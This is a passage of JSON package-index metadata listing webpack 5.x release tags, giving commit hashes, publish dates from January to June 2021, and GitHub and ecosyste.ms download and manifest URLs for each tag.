"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/